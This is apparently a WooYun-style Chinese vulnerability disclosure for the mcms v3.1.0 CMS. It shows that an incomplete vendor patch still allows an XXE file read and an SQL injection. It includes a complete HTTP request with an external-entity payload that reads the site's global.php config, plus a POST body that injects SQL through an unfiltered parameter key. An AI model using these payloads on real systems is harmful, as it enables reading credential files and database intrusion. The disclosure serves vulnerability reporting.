### 简要描述:
rt
### 详细说明:
先看看任意文件读取。
上次提交的这个 [WooYun: mcms v3.1.0 sql注入+任意文件读取。](http://www.wooyun.org/bugs/wooyun-2015-090986)
厂商的做法是
```
$wx=new weixin();
$_GET = H::sqlxss($_GET);
$_POST = H::sqlxss($_POST);
...........
function response_msg(){
global $dbm,$C;
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
if(!empty($postStr)){
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
...
$keyword = trim($postObj->Content);
$keyword = H::sqlxss($keyword);
```
$_GET = H::sqlxss($_GET);
$_POST = H::sqlxss($_POST);
$keyword = H::sqlxss($keyword);加了这么几句。
注入是不行了。
但是 依然可以任意文件读取啊~
post:
```
POST //app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9vl7m4ivoovc76am47nrnr3m81; CNZZDATA1253530733=784223860-1426700537-%7C1426700537; skip_url=mycenter.php
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: text/xml
Content-Length: 262
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<Content>a\</Content>
</xml>
```
[<img src="https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)
[<img src="https://images.seebug.org/upload/201503/19024329bff27c37615ebc73e574eccc0f332ee9.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19024329bff27c37615ebc73e574eccc0f332ee9.png)
再来看看注入。
D:/wamp/www/app/user/info.php
```
function m__save(){
global $dbm,$C,$V;
$_POST['info_body']=strip_tags($_POST['info_body'], '
<p><a><img>');
$_POST=H::sqlxss($_POST);
//处理附件参数
$attach= $oname = $order = $model_fields = array();
foreach($_POST as $k=>$v){
if(substr($k,0,9)=='attach___'){
$attach[$v]=$v;
$oname[$v]=($_POST['oname___'.$v]==''?'':$_POST['oname___'.$v]);
$order[$v]=($_POST['order___'.$v]==''?'':$_POST['order___'.$v]);
}
if (substr($k,0,9)=='extern___') { // 填充扩展表字段
$model_fields[substr($k,9)] = $v;
}
}
......
if($fields['model_name']!=''){
$model_fields['info_id']=$info_id;
//预先处理某些值 比如日期
foreach($model_fields as $k=>$v) {
$sql = "select form_type from ".TB_PRE."model_fields where model_name='".$fields['model_name']."' and field_name='".$k."' limit 1";
```
由于对于键名木有过滤,导致注入的产生,
post:
```
info_id=1&cate_id=2&model_name=product&info_title=aaaaaa&info_img=&info_body=11&extern___test 'sql语句=1
```
[<img src="https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png)
可以看到单引号进来了。可延时盲注- -
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png)
[<img src="https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)
京公网安备 11010502034610号
暂无评论